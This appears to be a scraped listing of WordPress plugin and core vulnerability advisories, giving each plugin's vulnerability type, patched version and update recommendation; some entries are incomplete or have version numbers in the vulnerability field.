Vulnerability: Cryptographic Weakness
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Authorization Bypass and Cross-Site Request Forgery
Patched Version: 4.2.22
Recommended Action: Update to version 4.2.22, or a newer patched version

Plugin: StatCounter – Free Real Time Visitor Stats

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Core: WordPress

Vulnerability: Directory Traversal
Patched Version: 4.1.38
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.38, 4.2.35, 4.3.31, 4.4.30, 4.5.29, 4.6.26, 4.7.26, 4.8.22, 4.9.23, 5.0.19, 5.1.16, 5.2.18, 5.3.15, 5.4.13, 5.5.12, 5.6.11, 5.7.9, 5.8.7, 5.9.6, 6.0.4, 6.1.2, 6.2.1

Plugin: Facebook Chat Plugin – Live Chat Plugin for WordPress

Vulnerability: Cross-Site Request Forgery to Site Settings Changes
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Pro <= 5.0.6
Patched Version: 5.0.7
Recommended Action: Update to version 5.0.7, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Subscriber+ SQL Injection
Patched Version: 2.18.10
Recommended Action: Update to version 2.18.10, or a newer patched version

Plugin: authLdap

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: WooODT Lite – Delivery & pickup date time location for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Gallery PhotoBlocks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.41
Recommended Action: Update to version 1.1.41, or a newer patched version

Plugin: Accept Stripe Payments

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.40
Recommended Action: Update to version 2.0.40, or a newer patched version

Plugin: Casso – Tự động xác nhận thanh toán chuyển khoản ngân hàng

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Onclick show popup

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: wp-limit-posts-automatically

Vulnerability: Cross-Site Request Forgery leading to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: CSV Injection
Patched Version: 2.2.20
Recommended Action: Update to version 2.2.20, or a newer patched version

Plugin: Front End Users

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.25
Recommended Action: Update to version 3.2.25, or a newer patched version

Plugin: Elfsight Instagram Widget – Instagram Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Watcheezy Live chat plugin for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WP Image Zoom

Vulnerability: Local File Inclusion
Patched Version: 1.47.1
Recommended Action: Update to version 1.47.1, or a newer patched version

Plugin: Zendesk Chat

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Survey Maker

Vulnerability: Authenticated SQL Injection
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated Arbitrary Options Update
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Filr – Secure document library

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 1.2.3.6
Recommended Action: Update to version 1.2.3.6, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: HTML filter and csv-file search

Vulnerability: Authenticated (Contributor+) Local File Inclusion via Shortcode
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Arabic Font

Core: WordPress

Vulnerability: Clickjacking
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Testimonial

Vulnerability: Multiple Vulnerabilities
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Breadcrumb

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5.33
Recommended Action: Update to version 1.5.33, or a newer patched version

Plugin: WP GDPR

Plugin: Wp Limits

Plugin: hpb Dashboard

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.6
Recommended Action: Update to version 5.6, or a newer patched version

Plugin: Cost of Goods: Product Cost & Profit Calculator for WooCommerce

Vulnerability: Cross-Site Request Forgery in save_costs
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Rife Elementor Extensions & Templates

Vulnerability: Missing Authorization via import_templates
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Easy Google Maps

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.11.8
Recommended Action: Update to version 1.11.8, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘pages’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Easy Form by AYS – Form Builder Plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Arbitrary File Upload
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: WP Image Resizer

Plugin: Quick Adsense

Vulnerability: Missing Authorization
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Ultimate Addons for Elementor

Vulnerability: Authentication Bypass
Patched Version: 1.20.1
Recommended Action: Update to version 1.20.1, or a newer patched version

Plugin: Limit Login Attempts

Vulnerability: Brute Force Bypass
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.22
Recommended Action: Update to version 2.9.22, or a newer patched version

Plugin: BizLibrary

Plugin: wpForo Forum

Vulnerability: Insecure Direct Object Reference to Forum Status Change
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Neshan Maps

Plugin: WP Menu Cart

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: WP Business Intelligence Lite

Vulnerability: Arbitrary File Upload
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: WP-Ban

Vulnerability: Improper Input Validation
Patched Version: 1.64
Recommended Action: Update to version 1.64, or a newer patched version

Plugin: Simple Real Estate Pack

Plugin: JH 404 Logger

Plugin: Wp-ImageZoom

Vulnerability: Directory Traversal
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Cookie Notice & Compliance for GDPR / CCPA

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Hotel Booking

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Cart Lift – Abandoned Cart Recovery for WooCommerce and EDD

Vulnerability: Reflected Cross-Site Scripting via cart_search
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Embed Any Document – Embed PDF, Word, PowerPoint and Excel Files

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via SVG files
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: WP-Filebase

Vulnerability: Missing Authorization Checks
Patched Version: 0.2.9.25
Recommended Action: Update to version 0.2.9.25, or a newer patched version

Plugin: SEO

Plugin: seo-watcher

Plugin: Be POPIA Compliant

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Conference Scheduler

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: GamiPress – Button

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: Advanced Booking Calendar

Vulnerability: Authenticated SQL Injection
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Custom Sidebars – Dynamic Sidebar Widget Area Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Pixabay Images

Vulnerability: Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Sync WooCommerce Product feed to Google Shopping

Plugin: CommentLuv

Vulnerability: Server Side Request Forgery via do_click
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – QR Codes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: BruteBank – WP Security & Firewall

Vulnerability: WP Security & Firewall <= 1.8
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: wp-slimstat-ex

Vulnerability: Arbitrary Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UpdraftCentral Dashboard

Vulnerability: Server-Side Request Forgery
Patched Version: 0.8.24
Recommended Action: Update to version 0.8.24, or a newer patched version

Plugin: MOLIE – Instructure Canvas Linking tool

Plugin: LeadSquared Suite

Plugin: WP Mail Logging

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email
Patched Version: 1.11.2
Recommended Action: Update to version 1.11.2, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Unauthenticated Privilege Escalation via User Meta
Patched Version: 2.1.12
Recommended Action: Update to version 2.1.12, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 8.0.18
Recommended Action: Update to version 8.0.18, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.59
Recommended Action: Update to version 1.5.59, or a newer patched version

Plugin: eShop

Plugin: Browser Theme Color

Vulnerability: Cross-Site Request Forgery via btc_settings_page
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Videojs HTML5 Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.09.05
Recommended Action: Update to version 4.09.05, or a newer patched version

Plugin: Stripe Payment Plugin for WooCommerce

Vulnerability: Missing Authorization to Arbitrary Order Status Modification
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.4.14
Recommended Action: Update to version 2.4.14, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘statusBulkEdit’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WP Limit Login Attempts

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Scripting via the rules[0][content] parameter in a wpfc_save_exclude_pages action
Patched Version: 0.8.8.6
Recommended Action: Update to version 0.8.8.6, or a newer patched version

Plugin: Genesis Columns Advanced

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WP Code Highlight.js

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 0.6.3
Recommended Action: Update to version 0.6.3, or a newer patched version

Plugin: AFFILIATE Solution

Plugin: Woodmart Core

Vulnerability: PHP Object Injection
Patched Version: 1.0.37
Recommended Action: Update to version 1.0.37, or a newer patched version

Plugin: Minify HTML

Vulnerability: Cross-Site Request Forgery in minify_html_menu_options
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: VS Contact Form

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 11.6
Recommended Action: Update to version 11.6, or a newer patched version

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: Missing Authorization
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: WordPress Country Selector

Vulnerability: Reflected Cross-Site Scripting via AJAX call of check_country_selector
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Ditty – Responsive News Tickers, Sliders, and Lists

Vulnerability: Authenticated (Contributor+) Stored Cross-Scripting via Shortcode
Patched Version: 3.0.33
Recommended Action: Update to version 3.0.33, or a newer patched version

Plugin: I Recommend This

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: WordPress Users

Vulnerability: SQL Injection
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Progressive License

Plugin: Hide My WP – Amazing Security Plugin for WordPress!

Vulnerability: Cross-Site Scripting
Patched Version: 4.54
Recommended Action: Update to version 4.54, or a newer patched version

Plugin: Autoptimize

Vulnerability: Race Condition leading to Remote Code Execution
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Authenticated (Editor+) SQL Injection
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: WordPress Button Plugin MaxButtons

Vulnerability: Cross-Site Scripting
Patched Version: 6.19
Recommended Action: Update to version 6.19, or a newer patched version

Plugin: Themify Icons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: WP Custom Cursors | WordPress Cursor Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: WP Tiles

Plugin: SagePay Server Gateway for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Dear Flipbook – PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.7.13
Recommended Action: Update to version 1.7.13, or a newer patched version

Plugin: Flexible Captcha

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LoginPress | wp-login Custom Login Page Customizer

Vulnerability: Unauthorized Settings Update
Patched Version: 1.1.14
Recommended Action: Update to version 1.1.14, or a newer patched version

Plugin: Splashing Images

Vulnerability: PHP Object Injection
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: SMTP Mail

Vulnerability: SQL Injection
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: No CAPTCHA reCAPTCHA for WooCommerce

Vulnerability: Missing Authorization to Notification Dismissal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 5.3.6.1
Recommended Action: Update to version 5.3.6.1, or a newer patched version

Plugin: Corner Ad

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.5.0.2
Recommended Action: Update to version 2.5.0.2, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Product Table by WBW

Vulnerability: Cross-Site Request Forgery via saveGroup
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Crayon Syntax Highlighter

Vulnerability: Remote File Inclusion
Patched Version: 1.14
Recommended Action: Update to version 1.14, or a newer patched version

Plugin: Uploading SVG, WEBP and ICO files

Plugin: Patreon WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: AdSanity

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: WP Maintenance

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 6.0.6
Recommended Action: Update to version 6.0.6, or a newer patched version

Plugin: Support Tickets Center

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authentication Bypass
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: SpiderCalendar

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.4.10
Recommended Action: Update to version 1.4.10, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: 9.8.4
Patched Version: 9.8.5
Recommended Action: Update to version 9.8.5, or a newer patched version

Plugin: Ninja Forms – File Uploads

Vulnerability: File Uploads Extension <= 3.3.0
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Customer Reviews for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.17.0
Recommended Action: Update to version 5.17.0, or a newer patched version

Plugin: Malware Scanner

Vulnerability: Cross-Site Scripting
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.1.3
Recommended Action: Update to version 7.1.3, or a newer patched version

Plugin: Seriously Simple Podcasting

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.16.1
Recommended Action: Update to version 2.16.1, or a newer patched version

Plugin: Modula Image Gallery

Vulnerability: Incomplete Authorization via ‘save_image’ and ‘save_images’
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: JetFormBuilder — Dynamic Blocks Form Builder

Vulnerability: Unauthenticated Content Injection
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: SendPress Newsletters

Plugin: Subscribe to Category

Plugin: ZdStatistics

Plugin: Lazyest Backup

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.2.2
Recommended Action: Update to version 0.2.2, or a newer patched version

Plugin: JCH Optimize

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Inline Google Spreadsheet Viewer

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.9.6.1
Recommended Action: Update to version 0.9.6.1, or a newer patched version

Plugin: Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories

Vulnerability: Contributor+ Arbitrary Post Schedule Deletion
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Gallery Plugin for WordPress – Envira Photo Gallery

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: PressForward

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.9
Recommended Action: Update to version 5.2.9, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Mingle Forum

Vulnerability: SQL Injection
Patched Version: 1.0.33
Recommended Action: Update to version 1.0.33, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.9.1
Recommended Action: Update to version 5.9.1, or a newer patched version

Core: WordPress

Vulnerability: Information Disclosure (Email Address)
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Slideshow, Image Slider by 2J

Vulnerability: Authorization Bypass
Patched Version: 1.3.33
Recommended Action: Update to version 1.3.33, or a newer patched version

Plugin: Search in Place

Vulnerability: Cross-Site Request Forgery to Feedback Submission
Patched Version: 1.0.105
Recommended Action: Update to version 1.0.105, or a newer patched version

Plugin: Sitemap by click5

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 1.0.36
Recommended Action: Update to version 1.0.36, or a newer patched version

Plugin: Ezoic

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: AccessPress Social Icons

Vulnerability: Author+ SQL Injection
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Email Before Download

Vulnerability: Admin+ SQL Injection
Patched Version: 6.8
Recommended Action: Update to version 6.8, or a newer patched version

Plugin: Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.54
Recommended Action: Update to version 2.0.54, or a newer patched version

Plugin: Gutenberg Blocks by WordPress Download Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Captain Slider

Plugin: Pricing Tables WordPress Plugin – Easy Pricing Tables

Vulnerability: Author+ Stored Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Cool Video Gallery

Vulnerability: Authenticated Command Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: 10Web Map Builder for Google Maps

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.0.73
Recommended Action: Update to version 1.0.73, or a newer patched version

Plugin: Mang Board WP

Vulnerability: SQL Injection
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Social Media Widget

Vulnerability: Arbitrary File Upload
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Deny All Firewall

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: WooCommerce Checkout & Funnel Builder by CartFlows – Create High Converting Stores For WooCommerce

Vulnerability: Arbitrary Plugin Activation
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: vSlider Multi Image Slider for WordPress

Plugin: Daily Prayer Time

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2023.10.21
Recommended Action: Update to version 2023.10.21, or a newer patched version

Plugin: event-espresso-core

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.10.7.p
Recommended Action: Update to version 4.10.7.p, or a newer patched version

Plugin: Easy Digital Downloads – Wish Lists

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Preview E-mails for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Remote File Inclusion
Patched Version: 2.1.57
Recommended Action: Update to version 2.1.57, or a newer patched version

Plugin: Timthumb Vulnerability Scanner

Plugin: BackupBuddy

Vulnerability: Authentication Bypass
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Nirweb support

Vulnerability: SQL Injection
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Ads Invalid Click Protection

Plugin: Advanced Import : One Click Import for WordPress or Theme Demo Data

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: JQuery Html5 File Upload

Plugin: Product Recommendation Quiz for eCommerce

Vulnerability: Missing Authorization in prq_set_token
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Unauthenticated SQL Injection via form_id
Patched Version: 3.1.24
Recommended Action: Update to version 3.1.24, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.11.28
Recommended Action: Update to version 7.11.28, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via theme directory name
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: WP Job Portal – A Complete Recruitment System for Company or Job Board website

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Social Feed | Custom Feed for Social Media Networks

Plugin: WordPress Flash Uploader

Vulnerability: Arbitrary Command Execution
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Auto Prune Posts

Vulnerability: Cross-Site Request Forgery via admin_menu
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP-DownloadManager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.68.7
Recommended Action: Update to version 1.68.7, or a newer patched version

Plugin: Build App Online

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.0.19
Recommended Action: Update to version 1.0.19, or a newer patched version

Plugin: Team Circle Image Slider With Lightbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Full Path Disclosure
Patched Version: 17.3
Recommended Action: Update to version 17.3, or a newer patched version

Plugin: Night Mode

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: CSS JS Manager, Async JavaScript, Defer Render Blocking CSS supports WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.49.1
Recommended Action: Update to version 2.4.49.1, or a newer patched version

Plugin: System Dashboard

Vulnerability: Missing Authorization to Information Disclosure (sd_constants)
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

